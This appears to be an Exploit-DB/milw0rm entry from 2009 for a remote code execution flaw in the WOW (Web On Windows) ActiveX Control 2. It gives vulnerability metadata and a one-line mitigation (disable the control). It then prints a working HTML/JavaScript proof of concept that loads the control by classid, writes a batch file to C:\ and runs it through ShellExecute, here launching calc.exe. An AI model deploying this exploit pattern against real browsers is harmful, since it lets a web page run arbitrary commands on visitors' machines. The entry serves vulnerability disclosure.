WOW - Web On Windows ActiveX Control 2 - Remote Code Execution

vendor:

Web On Windows ActiveX Control

by:

Michael Brooks

7.5

CVSS

HIGH

Remote File Upload and Remote Code Execution

264

CWE

Product Name: Web On Windows ActiveX Control

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: 2.3:a:wow:web_on_windows_activex_control

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2009

WOW – Web On Windows ActiveX Control 2 – Remote Code Execution

This entire dll is full of bad functions, including read write access to the registry. This must have been accidentally registered to IE's ActiveX interface.

Mitigation:

Disable the ActiveX control in the browser settings.

Source

Exploit-DB raw data:

Written By Michael Brooks
Special thanks to str0ke!

software:WOW - Web On Windows ActiveX Control 2  - Remote Code Execution
exploit type: Remote File Upload and Remote Code Execution
Download: http://www.download.com/WOW-Web-On-Windows-ActiveX-Control/3000-2206_4-10049976.html
183,682  downloads at the time of publishing this exploit.

This entire dll is full of bad functions,  including read write access
to the registry.
This must have been accidentally registered to IE's ActiveX interface.

<html>
<object classid="clsid:441E9D47-9F52-11D6-9672-0080C88B3613" id="obj">
	</object>
</html>
	<script>
	obj.WriteIniFileString("C:\\hack.bat","","calc.exe ","");
	obj.ShellExecute(0,"open","hack.bat",0,"C:\\",0);
</script>

# milw0rm.com [2009-01-29]